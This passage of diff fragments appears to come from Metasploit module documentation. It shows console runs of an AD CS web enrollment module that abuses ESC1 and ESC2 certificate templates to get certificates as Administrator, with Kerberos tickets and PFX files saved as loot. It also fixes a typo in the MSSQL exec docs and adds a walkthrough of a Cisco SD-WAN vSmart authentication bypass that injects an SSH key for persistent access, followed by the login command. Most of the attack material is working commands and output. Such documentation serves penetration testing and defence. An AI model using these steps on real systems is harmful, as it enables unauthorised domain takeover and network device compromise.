[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143556_default_10.5.132.180_mit.kerberos.cca_645978.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143557_default_10.5.132.180_mit.kerberos.cca_838211.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate generated using template ESC16_1 and
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143558_default_10.5.132.180_mit.kerberos.cca_485891.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143559_default_10.5.132.180_mit.kerberos.cca_709913.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate for using template ESC16_1 saved to /home/tmoose/.msf4/loot/20260116143559_default_10.5.132.180_windows.ad.cs_818976.pfx
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143601_default_10.5.132.180_mit.kerberos.cca_952232.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143601_default_10.5.132.180_mit.kerberos.cca_169000.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate generated using template ESC2-Template and
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143603_default_10.5.132.180_mit.kerberos.cca_042983.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143603_default_10.5.132.180_mit.kerberos.cca_512322.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate for using template ESC2-Template saved to /home/tmoose/.msf4/loot/20260116143604_default_10.5.132.180_windows.ad.cs_206522.pfx
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143607_default_10.5.132.180_mit.kerberos.cca_893032.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143607_default_10.5.132.180_mit.kerberos.cca_156631.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate generated using template WebServer and
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143608_default_10.5.132.180_mit.kerberos.cca_982799.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143609_default_10.5.132.180_mit.kerberos.cca_247412.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate for using template WebServer saved to /home/tmoose/.msf4/loot/20260116143609_default_10.5.132.180_windows.ad.cs_955795.pfx
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143612_default_10.5.132.180_mit.kerberos.cca_119902.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143613_default_10.5.132.180_mit.kerberos.cca_847610.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate generated using template SubCA and
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143614_default_10.5.132.180_mit.kerberos.cca_417480.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143615_default_10.5.132.180_mit.kerberos.cca_766015.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate for using template SubCA saved to /home/tmoose/.msf4/loot/20260116143615_default_10.5.132.180_windows.ad.cs_888697.pfx
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143617_default_10.5.132.180_mit.kerberos.cca_866496.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143617_default_10.5.132.180_mit.kerberos.cca_528295.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate generated using template ESC1-Template and
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143619_default_10.5.132.180_mit.kerberos.cca_103101.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143619_default_10.5.132.180_mit.kerberos.cca_871753.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate for using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116143620_default_10.5.132.180_windows.ad.cs_135453.pfx
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(admin/http/web_enrollment_cert) >
|
||||
|
||||
```
|
||||
|
||||
# Kerberos, ESC1
|
||||
```msf
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set MODE QUERY_ONLY
|
||||
MODE => QUERY_ONLY
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > run
|
||||
[*] Retrieving available template list, this may take a few minutes
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144412_default_10.5.132.180_mit.kerberos.cca_605997.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144413_default_10.5.132.180_mit.kerberos.cca_011223.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
|
||||
[+] Available Certificates for on : User, EFS, Administrator, EFSRecovery, ESC16_1, ESC2-Template, WebServer, SubCA, ESC1-Template
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set httpusername msfuser
|
||||
httpusername => msfuser
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set httppassword v3Mpassword
|
||||
httppassword => v3Mpassword
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set mode SPECIFIC_TEMPLATE
|
||||
mode => SPECIFIC_TEMPLATE
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set cert_template ESC1-Template
|
||||
cert_template => ESC1-Template
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set ALT_UPN Administrator@example.com
|
||||
ALT_UPN => Administrator@example.com
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > run
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144915_default_10.5.132.180_mit.kerberos.cca_142147.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144915_default_10.5.132.180_mit.kerberos.cca_645508.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate generated using template ESC1-Template and
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144917_default_10.5.132.180_mit.kerberos.cca_079562.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144917_default_10.5.132.180_mit.kerberos.cca_912221.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate for using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116144918_default_10.5.132.180_windows.ad.cs_076676.pfx
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(admin/http/web_enrollment_cert) >
|
||||
|
||||
|
||||
```
|
||||
|
||||
# Kerberos, ESC2
|
||||
```msf
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > show options
|
||||
|
||||
Module options (auxiliary/admin/http/web_enrollment_cert):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
ALT_DNS no Alternative certificate DNS
|
||||
ALT_SID no Alternative object SID
|
||||
ALT_UPN Administrator@example.com no Alternative certificate UPN (format: USER@DOMAIN)
|
||||
HttpPassword v3Mpassword no The HTTP password to specify for authentication
|
||||
HttpUsername msfuser no The HTTP username to specify for authentication
|
||||
MODE SPECIFIC_TEMPLATE yes The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
|
||||
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
|
||||
PFX no Certificate to request on behalf of
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxi
|
||||
es: socks5h, sapni, socks4, http, socks5
|
||||
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/bas
|
||||
ics/using-metasploit.html
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI /certsrv/ yes The URI for the cert server.
|
||||
THREADS 1 yes The number of concurrent threads (max one per host)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
When MODE is SPECIFIC_TEMPLATE:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CERT_TEMPLATE ESC1-Template no The template to issue if MODE is SPECIFIC_TEMPLATE.
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set CERT_TEMPLATE User
|
||||
CERT_TEMPLATE => User
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > unset ALT_UPN
|
||||
Unsetting ALT_UPN...
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > run
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150908_default_10.5.132.180_mit.kerberos.cca_798433.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150908_default_10.5.132.180_mit.kerberos.cca_355039.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate generated using template User and
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150910_default_10.5.132.180_mit.kerberos.cca_649135.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150910_default_10.5.132.180_mit.kerberos.cca_950645.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate for using template User saved to /home/tmoose/.msf4/loot/20260116150911_default_10.5.132.180_windows.ad.cs_854591.pfx
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set PFX /home/tmoose/.msf4/loot/20260116150911_default_10.5.132.180_windows.ad.cs_854591.pfx
|
||||
PFX => /home/tmoose/.msf4/loot/20260116150911_default_10.5.132.180_windows.ad.cs_854591.pfx
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set ON_BEHALF_OF EXAMPLE\\Administrator
|
||||
ON_BEHALF_OF => EXAMPLE\Administrator
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set cert_template User
|
||||
cert_template => User
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > run
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151145_default_10.5.132.180_mit.kerberos.cca_970115.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151145_default_10.5.132.180_mit.kerberos.cca_854009.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate generated using template User and
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151147_default_10.5.132.180_mit.kerberos.cca_332600.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151147_default_10.5.132.180_mit.kerberos.cca_241072.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate for using template User saved to /home/tmoose/.msf4/loot/20260116151147_default_10.5.132.180_windows.ad.cs_115992.pfx
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(admin/http/web_enrollment_cert) >
|
||||
|
||||
|
||||
|
||||
|
||||
```
|
||||
|
||||
@@ -21,7 +21,7 @@ technique leverages the [`sp_OACreate`][2] stored procedure to create an instanc
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: `use use admin/mssql/mssql_exec`
|
||||
1. Do: `use admin/mssql/mssql_exec`
|
||||
2. Do: `set USERNAME [username1]`
|
||||
3. Do: `set PASSWORD [password1]`
|
||||
3. Do: `set TECHNIQUE sp_oacreate` (optional, defaults to xp_cmdshell)
|
||||
@@ -32,7 +32,7 @@ technique leverages the [`sp_OACreate`][2] stored procedure to create an instanc
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use use use admin/mssql/mssql_exec
|
||||
msf > use admin/mssql/mssql_exec
|
||||
msf auxiliary(mssql_exec) > set USERNAME username1
|
||||
USERNAME => username1
|
||||
msf auxiliary(mssql_exec) > set PASSWORD password1
|
||||
|
||||
@@ -0,0 +1,207 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits CVE-2026-20127, an authentication bypass vulnerability in the Cisco Catalyst SD-WAN Controller
|
||||
(vSmart). The vulnerability exists in the vdaemon DTLS control-plane service running on UDP port 12346.
|
||||
|
||||
The vdaemon service fails to properly validate the `verify_status` byte in `CHALLENGE_ACK_ACK` (msg_type=10) messages.
|
||||
The `vbond_proc_challenge_ack_ack()` handler reads an attacker-controlled `verify_status` byte from the message body and,
|
||||
if non-zero, sets the peer's authenticated flag to 1. Furthermore, the authentication gate in `vbond_proc_msg()` exempts
|
||||
msg_type=10 from authentication checks, allowing an unauthenticated peer to send this message.
|
||||
|
||||
An attacker can:
|
||||
1. Connect via DTLS 1.2 using a self-signed certificate (the server performs no certificate validation at the handshake stage)
|
||||
2. Skip the `CHALLENGE_ACK` step entirely
|
||||
3. Send a forged `CHALLENGE_ACK_ACK` message with `verify_status=1` to become a trusted peer without any legitimate credentials
|
||||
|
||||
Once authenticated, the module leverages a `VMANAGE_TO_PEER` message to inject an SSH public key into the
|
||||
`/home/vmanage-admin/.ssh/authorized_keys` file, providing persistent SSH access to the controller's NETCONF service
|
||||
on port 830.
|
||||
|
||||
### Affected Versions
|
||||
|
||||
The vulnerability affects Cisco Catalyst SD-WAN Controller (vSmart) versions prior to the patches released in February 2026.
|
||||
Consult [Cisco's security advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk)
|
||||
for a complete list of affected versions and patches.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. `use auxiliary/admin/networking/cisco_sdwan_auth_bypass`
|
||||
3. `set RHOST <target_ip>`
|
||||
4. Optionally, `set DOMAIN_ID <domain_id>` and `set SITE_ID <site_id>` if you know the target's SD-WAN topology
|
||||
5. `check` to verify the target is vulnerable
|
||||
6. `run` to exploit the vulnerability and inject an SSH public key
|
||||
7. Use the generated SSH private key to connect to the NETCONF service: `ssh -i <key_path> vmanage-admin@<target_ip> -p 830`
|
||||
|
||||
## Options
|
||||
|
||||
### DOMAIN_ID
|
||||
|
||||
The SD-WAN domain ID to use in protocol messages. Default: `1`.
|
||||
|
||||
This value must match the domain ID configured on the target controller. In most deployments, the default value of 1
|
||||
is used. If you receive a `TEAR_DOWN` message after sending `Hello`, try adjusting this value.
|
||||
|
||||
### SITE_ID
|
||||
|
||||
The SD-WAN site ID to use in protocol messages. Default: `100`.
|
||||
|
||||
This value identifies the site in the SD-WAN topology. The default value should work in most cases, but if the exploit
|
||||
fails, you may need to adjust this based on knowledge of the target's SD-WAN configuration.
|
||||
|
||||
### SSH_PUBLIC_KEY_FILE
|
||||
|
||||
Path to an existing SSH public key file (in OpenSSH format) to inject into the controller.
|
||||
|
||||
If not set, the module will automatically generate a new RSA 2048-bit SSH keypair. Using an existing key can be useful
|
||||
if you want to maintain access using a key you already control.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Cisco Catalyst SD-WAN Controller 20.15.3 (Default Configuration)
|
||||
|
||||
In this scenario, we target a vSmart controller with default settings. The module automatically generates an SSH keypair
|
||||
and injects the public key.
|
||||
|
||||
```
|
||||
msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > show options
|
||||
|
||||
Module options (auxiliary/admin/networking/cisco_sdwan_auth_bypass):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
DOMAIN_ID 1 yes SD-WAN domain ID
|
||||
RHOSTS 192.168.86.166 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
|
||||
metasploit.html
|
||||
RPORT 12346 yes The target port (UDP)
|
||||
SITE_ID 100 yes SD-WAN site ID
|
||||
SSH_PUBLIC_KEY_FILE no Path to an existing SSH public key file to inject
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > check
|
||||
[+] 192.168.86.166:12346 - The target is vulnerable. Authentication bypass succeeded - server accepted forged CHALLENGE_ACK_ACK
|
||||
msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > run
|
||||
[*] Running module against 192.168.86.166
|
||||
[*] Phase 1: DTLS handshake with self-signed certificate
|
||||
[*] DTLS handshake succeeded (self-signed cert accepted)
|
||||
[*] Phase 2: Waiting for CHALLENGE from server
|
||||
[*] CHALLENGE received (580 bytes of challenge data)
|
||||
[*] Phase 3: Sending CHALLENGE_ACK_ACK with verify_status=1
|
||||
[*] Server Hello received
|
||||
[*] Phase 4: Sending Hello as authenticated peer
|
||||
[*] Hello response received - we are now a trusted peer
|
||||
[*] Phase 5: SSH key injection into vmanage-admin authorized_keys
|
||||
[*] Generating RSA 2048-bit SSH keypair
|
||||
[*] SSH private key saved to loot: /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem
|
||||
[+] Connect to NETCONF via:
|
||||
chmod 600 /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem
|
||||
ssh -i /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem vmanage-admin@192.168.86.166 -p 830
|
||||
[*] Server responded with: REGISTER_TO_VMANAGE (key has been injected)
|
||||
[+] Authentication bypass and SSH key injection completed!
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) >
|
||||
|
||||
```
|
||||
|
||||
Now we can use the generated SSH key to access the NETCONF service:
|
||||
|
||||
```console
|
||||
sfewer@sfewer-ubuntu-vm:~$ chmod 600 /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem
|
||||
sfewer@sfewer-ubuntu-vm:~$ ssh -i /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem vmanage-admin@192.168.86.166 -p 830
|
||||
viptela 20.15.3
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<hello xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
|
||||
<capabilities>
|
||||
<capability>urn:ietf:params:netconf:base:1.0</capability>
|
||||
<capability>urn:ietf:params:netconf:base:1.1</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:confirmed-commit:1.1</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:confirmed-commit:1.0</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:candidate:1.0</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:rollback-on-error:1.0</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:url:1.0?scheme=ftp,sftp,file</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:validate:1.0</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:validate:1.1</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:xpath:1.0</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:notification:1.0</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:interleave:1.0</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:partial-lock:1.0</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:with-defaults:1.0?basic-mode=trim&also-supported=report-all-tagged,report-all</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:with-operational-defaults:1.0?basic-mode=trim&also-supported=report-all-tagged,report-all</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:yang-library:1.0?revision=2019-01-04&module-set-id=f1952c280658dd3701add48f1c71cbca</capability>
|
||||
<capability>urn:ietf:params:netconf:capability:yang-library:1.1?revision=2019-01-04&content-id=f1952c280658dd3701add48f1c71cbca</capability>
|
||||
<capability>http://tail-f.com/ns/netconf/actions/1.0</capability>
|
||||
<capability>http://tail-f.com/ns/aaa/1.1?module=tailf-aaa&revision=2023-04-13</capability>
|
||||
<capability>http://tail-f.com/ns/common/query?module=tailf-common-query&revision=2017-12-15</capability>
|
||||
<capability>http://tail-f.com/ns/confd-progress?module=tailf-confd-progress&revision=2020-06-29</capability>
|
||||
<capability>http://tail-f.com/ns/confd_dyncfg/1.0?module=confd_dyncfg&revision=2023-09-29</capability>
|
||||
<capability>http://tail-f.com/ns/ietf-subscribed-notifications-deviation?module=ietf-subscribed-notifications-deviation&revision=2020-06-25</capability>
|
||||
<capability>http://tail-f.com/ns/ietf-yang-push-deviation?module=ietf-yang-push-deviation</capability>
|
||||
<capability>http://tail-f.com/ns/kicker?module=tailf-kicker&revision=2020-11-26</capability>
|
||||
<capability>http://tail-f.com/ns/mibs/IPV6-TC/199812010000Z?module=IPV6-TC&revision=1998-12-01</capability>
|
||||
<capability>http://tail-f.com/ns/mibs/SNMP-COMMUNITY-MIB/200308060000Z?module=SNMP-COMMUNITY-MIB&revision=2003-08-06</capability>
|
||||
<capability>http://tail-f.com/ns/mibs/SNMP-FRAMEWORK-MIB/200210140000Z?module=SNMP-FRAMEWORK-MIB&revision=2002-10-14</capability>
|
||||
<capability>http://tail-f.com/ns/mibs/SNMP-MPD-MIB/200210140000Z?module=SNMP-MPD-MIB&revision=2002-10-14</capability>
|
||||
<capability>http://tail-f.com/ns/mibs/SNMP-NOTIFICATION-MIB/200210140000Z?module=SNMP-NOTIFICATION-MIB&revision=2002-10-14</capability>
|
||||
<capability>http://tail-f.com/ns/mibs/SNMP-TARGET-MIB/200210140000Z?module=SNMP-TARGET-MIB&revision=2002-10-14</capability>
|
||||
<capability>http://tail-f.com/ns/mibs/SNMP-USER-BASED-SM-MIB/200210160000Z?module=SNMP-USER-BASED-SM-MIB&revision=2002-10-16</capability>
|
||||
<capability>http://tail-f.com/ns/mibs/SNMP-VIEW-BASED-ACM-MIB/200210160000Z?module=SNMP-VIEW-BASED-ACM-MIB&revision=2002-10-16</capability>
|
||||
<capability>http://tail-f.com/ns/mibs/SNMPv2-MIB/200210160000Z?module=SNMPv2-MIB&revision=2002-10-16</capability>
|
||||
<capability>http://tail-f.com/ns/mibs/SNMPv2-SMI/1.0?module=SNMPv2-SMI</capability>
|
||||
<capability>http://tail-f.com/ns/mibs/SNMPv2-TC/1.0?module=SNMPv2-TC</capability>
|
||||
<capability>http://tail-f.com/ns/mibs/TRANSPORT-ADDRESS-MIB/200211010000Z?module=TRANSPORT-ADDRESS-MIB&revision=2002-11-01</capability>
|
||||
<capability>http://tail-f.com/ns/netconf/query?module=tailf-netconf-query&revision=2017-01-06</capability>
|
||||
<capability>http://tail-f.com/yang/acm?module=tailf-acm&revision=2013-03-07</capability>
|
||||
<capability>http://tail-f.com/yang/common?module=tailf-common&revision=2023-12-07</capability>
|
||||
<capability>http://tail-f.com/yang/common-monitoring?module=tailf-common-monitoring&revision=2022-09-29</capability>
|
||||
<capability>http://tail-f.com/yang/common-monitoring2?module=tailf-common-monitoring2&revision=2022-09-29</capability>
|
||||
<capability>http://tail-f.com/yang/confd-monitoring?module=tailf-confd-monitoring&revision=2022-09-29</capability>
|
||||
<capability>http://tail-f.com/yang/confd-monitoring2?module=tailf-confd-monitoring2&revision=2022-10-03</capability>
|
||||
<capability>http://tail-f.com/yang/last-login?module=tailf-last-login&revision=2019-11-21</capability>
|
||||
<capability>http://tail-f.com/yang/netconf-monitoring?module=tailf-netconf-monitoring&revision=2022-04-12</capability>
|
||||
<capability>http://tail-f.com/yang/xsd-types?module=tailf-xsd-types&revision=2017-11-20</capability>
|
||||
<capability>http://viptela.com/aaa-ext?module=viptela-aaa-ext&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/actions?module=viptela-actions&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/clear?module=viptela-clear&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/common?module=viptela-common&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/debug?module=viptela-debug&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/devices?module=viptela-devices</capability>
|
||||
<capability>http://viptela.com/hardware?module=viptela-hardware&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/idmgr?module=viptela-idmgr&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/models?module=viptela-models</capability>
|
||||
<capability>http://viptela.com/omp?module=viptela-omp&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/oper-idmgr?module=viptela-oper-idmgr&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/oper-system?module=viptela-oper-system&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/oper-tenant?module=viptela-oper-tenant</capability>
|
||||
<capability>http://viptela.com/oper-vpn?module=viptela-oper-vpn&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/policy?module=viptela-policy&revision=2024-07-01&deviations=viptela-policy-deviation</capability>
|
||||
<capability>http://viptela.com/security?module=viptela-security&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/snmp?module=viptela-snmp&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/snmp-usm?module=viptela-snmp-usm&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/support?module=viptela-support&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/system?module=viptela-system&revision=2024-07-01&deviations=viptela-system-deviation</capability>
|
||||
<capability>http://viptela.com/tag-instance?module=viptela-tag-instance&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/tenant?module=viptela-tenant&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/timezones?module=viptela-timezones&revision=2024-07-01</capability>
|
||||
<capability>http://viptela.com/viptela-clear-tenant?module=viptela-clear-tenant</capability>
|
||||
<capability>http://viptela.com/viptela-debug-tenant?module=viptela-debug-tenant</capability>
|
